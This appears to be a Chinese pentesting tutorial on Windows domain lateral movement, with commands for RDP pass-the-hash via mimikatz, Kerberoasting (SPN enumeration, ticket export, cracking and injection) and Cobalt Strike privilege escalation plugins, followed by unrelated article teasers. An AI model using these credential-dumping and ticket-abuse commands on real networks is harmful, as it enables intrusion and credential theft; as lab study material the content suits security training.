p69 内网安全-域横向 CobaltStrikeSPNRDP

news2024/12/27 17:12:42

数据来源

SPN(Secret Private Network缩写)_百度百科 (baidu.com)

演示案例

  • 域横向移动RDP传递-Mimikatz
  • 域横向移动SPN服务-探针,请求,导出,破解,重写
  • 域横向移动测试流程一把梭哈-CobaltStrike初体验

案例1-域横向移动RDP传递-Mimikatz 

除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作

RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断

1)RDP明文密码链接

要使用RDP协议控制目标的桌面前提:

  1. 已经收集到目标主机的远程桌面账号(就是有权限连接到远程桌面的本地或域账号)
  2. 目标开启了远程桌面服务,默认是3369端口

扫描端口与破解账号:(20条消息) kail - 扫描与爆破_正经人_____的博客-CSDN博客

Windows:(我这里用win7连接win2008做演示)

首先在win2008开启远程桌面

win7的cmd中输入下面的命令

# mstsc是windows系统自带的程序

#                      目标端口
mstsc.exe /console /v:192.168.1.61 /admin

 

Linux:(我是在kali中连接win2008)

# kaili rdesktop 
rdesktop 192.168.1.61:3389

kali最强的渗透神器 - metasploit 

        这里说到了kali顺便给你们介绍个kali最强的渗透神器 - metasploit,使用场景:以永恒之蓝漏洞为例,比如你发现你要攻击的目标没有开启3389端口并且你连他的账号密码都不知道,但是你发现目标的445端口是开启的(这个端口默认是开启的,除非受害者的安全意识很好不然不会关闭),这时你就可以使用metasploit 利用永恒之蓝漏洞对目标进行攻击(这个漏洞就是利用445端口,不同的漏洞利用的端口也不同,如果你有更好的利用方式我们可以一起交流进步)

说一下大概的利用流程:利用永恒之蓝漏洞对目标进行攻击 —>攻击成功就开启目标的3389端口 ->然后在目标主机上创建一个后门账号以后我们就可以利用这个后门账号进行登录受害者的远程桌面

详情的流程我这里就不多说了,我以前写过一篇利用文章你们需要可以参考一下:Kali最强渗透工具- metasploit_kali系统常用渗透工具_正经人_____的博客-CSDN博客

2)RDP密文HASH链接

Mimikatz官网:GitHub - gentilkiwi/mimikatz:一个玩Windows安全的小工具

我这里直接在目标主机使用Mimikatz收集账号的hash

使用cmd启动mimikatz工具

privilege::debug # 调试

sekurlsa::ekeys # 获取 aes

sekurlsa::logonpasswords   # 收集PTH攻击方式的NTLM、LM信息

LM是旧版,NILM是新版(我现在用的就是这个) 

windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;开启命令:

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

开启后运行:

# 打开远程桌面的使用教程
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:442285a710fe49913e8b9a2861781eec "/run:mstsc.exe /restrictedadmin"
net use \\192.168.1.61\c$
dir \\192.168.1.61\c$

案例2-域横向移动SPN服务-探针,请求,破解,重写

https://www.cnblogs.com/backlion/p/8082623.html

        黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。

探针(要在域账号中执行下面的命令,普通域或域控账号都可以)

1)查看域所有主机的服务

# windows系统自带的setspn可以查询域内的SPN
setspn -q */*           # 获取所有服务

 2)查看指定服务的名称

例如:我们要攻击DNS服务,那就专门查看DNS的服务名 

setspn -q */* | findstr "DNS"
# 首先打开cmd输入下面的命令清空之前凭证
klist purge

# 查看凭证列表,看是否删除成功了
klist

 

请求(这里要用 powershell 执行命令,cmd报错)

#
Add-Type -AssemblyName System.IdentityModel

# 请求DNS      我这里是: DNS/WIN-I7NPA55KMBD.zs.com
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"

# 或使用mimikatz去请求
mimikatz.exe "kerberos::ask /target:xxxx"

再次查看凭证列表现在就有东西了

# 查看凭证列表
klist

导出(导出刚才的票证信息)

这里要用都Mimikatz工具

Mimikatz官网:GitHub - gentilkiwi/mimikatz:一个玩Windows安全的小工具

mimikatz.exe "kerberos::list /export"

破解

使用 tgsrepcrack.py 破解

项目地址:https://github.com/nidem/kerberoast

# 用python运行脚本     密码字典     凭证的文件
python tgsrepcrack.py passwd.txt xxxx.kirbi
python .\tgsrepcrack.py .\passwd.txt .\2-40a40000-zhangsan@DNS~WIN-I7NPA55KMBD.zs.com-ZS.COM.kirbi

重写

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存

案例3-域横向移动测试流程一把梭哈-CobaltStrike初体验

安装与使用可以参考我之前写的文章:(下面的内容我会写一些之前没有的CS操作 )cobaltstrike的安装与基础使用_windows安装cobaltstrike_正经人_____的博客-CSDN博客 

大概流程:

启动-配置-监听-执行-上线-提权-信息收集(网络,凭证,定位等)-渗透

1)关于启动及配置讲解

我之前的文章有写,这里就不多说了

2)关于提权及插件加载

1、提权

说明:提权操作是目标有这个漏洞才能提权(如果你也不请求目标主机的漏洞是啥就一个个尝试),而且只能将administrator账号(管理员)提权到system账户(系统)

使用插件提权 (这使用视频中老师推荐的插件) 

先演示一下梼杌:GitHub - pandasec888/taowu-cobalt-strike

# 克隆插件到CS根目录
git clone https://github.com/pandasec888/taowu-cobalt-strike.git

直接从github上克隆因为网站是外国的容易断开报错,建议还是下载压缩包再拉进入

使用插件

修改一下执行时间,默认是60s才会执行操作 

 

调好之后我们就可以使用这个插件的功能了,如:一键获取目标主机信息(主机硬件、域、ip、FTP等信息)

注意:下面的操作都是要先进入CS的命令行才能看到操作结果

使用插件的权限提升功能

操作都是中文的其他操作自己玩一会就知道了(注意:一定要调一下延时操作,不然默认是60s

ElevateKit 演示:ElevateKit

我的受害者主机是win7最终选择uac-token-duplication 提权成功

        uac-token-duplication是一种绕过uac方式的攻击,吧地权限提高到高权限,利用一个UAC漏洞,允许非提升进程使用提升进程中窃取的令牌来启动,适用于win7 (参考)

3)关于信息收集命令讲解

我感觉这些命令都不是很好用

net view          # 查看目标的共享
net computers   # 查看域的成员
net dclist 
shell net user /domain

建议还是使用查插件进行信息搜集

 4)关于视图自动化功能讲解

操作都是中文的感觉没啥好写的 

涉及资源:(参考)

  • kerberos中的spn详解:https://www.cnblogs.com/backlion/p/8082623.html

  • kerberoast:https://github.com/nidem/kerberoast

  • taowu-cobalt-strike(插件-小迪精选):https://github.com/pandasec888/taowu-cobalt-strike

  • Cobalt Strike 4.0手册:https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取码:dtm2

  • 红队实战演练环境:https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取码:taqu

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/467869.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

python+nodejs+php+springboot+vue 企业员工健康体检预约管理系统

目 录 1 引言 1 1.1 研究的目的及意义 2 1.2 研究的主要内容 2 1.3 本文的组织结构 2 2 平台开发相关技术 3 2.1python技术的简介 3 2.2 django框架 4 2.3 MYSQL数据库 4 2.4 MySQL环境配置 5 2.5 B/S架构 5 3 软件系统需求及可行性分析 …

SpringCould+vue3项目的后台用户管理的CURD【VegePig教育平台】

文章目录 一.SpringCouldvue3项目的后台用户管理的CURD【VegePig教育平台】1.1 背景 二.用户列表(分页查询)2.1 前端Vue3 (Vue3-Element-Admin)2.2 后端SpringCould 处理 三. 用户信息删除3.1 前端Vue3 (Vue3-Element-…

斐波那契数列、卡特兰数

一、斐波那契数列(兔子序列) 1, 1, 2, 3, 5, 8, 13, 21, ... 递推公式:f(1)f(2)1; f(n)f(n-1)f(n-2) (n>3) 快速求f(n):矩阵快速幂(logn) 二、卡特兰数 1, 2, 5, 14, 42, 132, 429, 1430, 4862, ...…

selenium自动化环境搭建(Windows)

一、selenium介绍 selenium主要用于web应用程序的自动化测试,还支持所有基于web的管理任务自动化。 selenium经历了2个版本,selenium1.0和selenium2.0;selenium不是一个单独的工具,而是由一些插件、类库构成,每个组成…

__pycache__文件夹是什么,是缓存文件吗,可以删除吗

1.什么是__pycache__文件 用python编写好一个工程,在第一次运行后,总会发现工程根目录下生成了一个__pycache__文件夹,里面是和py文件同名的各种*.pyc或者*.pyo文件。名字上看应该是相应的缓存文件。 那为什么会出现__pycache__文件&#x…

go chan基本使用

1、有缓冲的chan 与无缓冲的chan 怎么理解这个缓冲,我个人的理解是是执行这个chan 操作的时候是否发送阻塞。 操作:读和写。 读取的时候,我们都应该要是阻塞的,例如我们的socket、的recv函数。当然取决于你设置的是阻塞的套接字还…

在安装docker配置端口时 centos7 防火墙规则失效

一、问题 1、做端口映射管理的时候,自己关闭了防火墙,或者开启防火墙,或者指定开关端口,但是都不影响端口的使用,这就很奇怪,也就是本文的内容! 2、思路,确认是请求到了防火墙的那…

MySQL: 自动添加约束、更改(删除)表名和字段、删除表

目录 自动添加表的属性: 向表内插入数据: 查看表中的数据: 查看表结构: 查看表的详细结构: 更改表名和字段: 更改表名: 更改字段数据类型: 修改字段名: 添加字段…

约瑟夫环+考勤刷卡(蓝桥杯JAVA解法)

约瑟夫环:用户登录 题目描述 设有 n 个人围坐在圆桌周围,现从某个位置 k 上的人开始报数,报数到 m 的人就站出来。下一个人,即原来的第 m1 个位置上的人,又从 1 开始报数,再报数到 m 的人站出来。依次重复…

上传ipa到appstore详细步骤

使用hbuilderx或apicloud云打包后,会生成一个ipa文件,而iphone是无法直接安装这个ipa文件的,需要将这个ipa文件上架,才能安装使用。那么如何上架呢? hbuilderx和apicloud并没有上架的教程,而苹果官方是推荐…

基于Jenkins,docker实现自动化部署(持续交互)【转】

前言 随着业务的增长,需求也开始增多,每个需求的大小,开发周期,发布时间都不一致。基于微服务的系统架构,功能的叠加,对应的服务的数量也在增加,大小功能的快速迭代,更加要求部署的…

在 Apple 设备(包括 iPad、iOS 和 MacBook)上为用户提供完整的 SAP GUI

苹果应用功能 高效且直观的用户界面。 访问 VA01、MI31、MI04、IW21 等。– 无编程 自动化和简化您的 SAP 流程,如库存盘点 在 Apple 设备(包括 iPad、iOS 和 MacBook)上为用户提供完整的 SAP GUI,利用他们已经了解的 UI 丰富性并…

持续集成——web自动化测试集成实战

文章目录 一、Web自动化测试持续集成的好处二、环境准备三、Jenkins节点挂载四、节点环境的配置1、JDK2、Chrome 浏览器3、chromedriver4、Python3环境5、allure-commandline工具6、allure插件 五、本地运行待测代码(保证代码没有问题)六、库文件的导出七、Jenkins上运行代码配…

高功率激光切割中不良现象的排除技巧

高功率切割市场现状 随着激光行业的发展和下游产业需求的变化,高功率的激光切割设备已逐渐成为市场关注的热点。高功率激光切割凭着速度和厚度上无可比拟的优势,目前已获得了市场的广泛认可。 但由于高功率激光切割技术尚处于普及的初级阶段,…

栈溢出的原理

目录 缓冲区 我们先以解决这个题目为准 然后通过这个题目去做透 gdb 代码段 栈中 当前时刻寄存器存储的内容 1 寻找漏洞函数 输入 输出 字符串 2 确定填充长度 覆盖函数返回地址 覆盖栈上变量的内容 覆盖bss段 栈溢出是在堆栈中 对某一个变量无限制的输入 超出了…

【三十天精通Vue 3】第十九天 Vue 3的渐进式Web应用程序详解

✅创作者:陈书予 🎉个人主页:陈书予的个人主页 🍁陈书予的个人社区,欢迎你的加入: 陈书予的社区 🌟专栏地址: 三十天精通 Vue 3 文章目录 引言一、什么是渐进式 Web 应用程序1.1 渐进式 Web 应用程序的定义…

市场预测美联储加息的有效性几何

美联储加息已狂飙一年,很多相关预测美联储加息降息的文章都会提到“一年内加息多少次的概率是多少多少”这种表述,那么这个数据是怎样计算的?本期笔者将简单讨论美国联邦利率的运作机制,介绍用于预测联储加/降息概率的方式&#x…

vue批量生成二维码,打印生成的二维码,并批量下载生成的二维码,qrcode

通过使用 qrcode 生成二维码, 使用 jszip 打包批量二维码文件, 使用 file-saver 下载打包好的zip文件, 使用 vue-print-nb 打印生成的二维码 生成二维码: 打印二维码 下载二维码 1. 批量生成二维码—安装依赖 ![请添加图片描述]…

CH32F203RCT6 pin2pin兼容STM32F103RCT6

32位大容量通用型Cortex-M3单片机 CH32F203是基于Cortex-M3内核设计的工业级大容量通用微控制器,此系列主频高达144MHz,独立了GPIO电压(与系统供电分离)。资源同比增加了随机数单元,4组运放比较器;提高串口…

硅烷PEG马来酰亚胺,Silane-PEG-Mal,马来酰亚胺聚乙二醇硅烷

中文名称:马来酰亚胺聚乙二醇硅烷 英文名称:Silane-PEG-Maleimide,Silane-PEG-MAL 性状:液体或者固体,取决于分子量 溶剂:溶于水、DMSO、DMF、DCM等常规性有机溶剂 活性基团:MAL 分子量&am…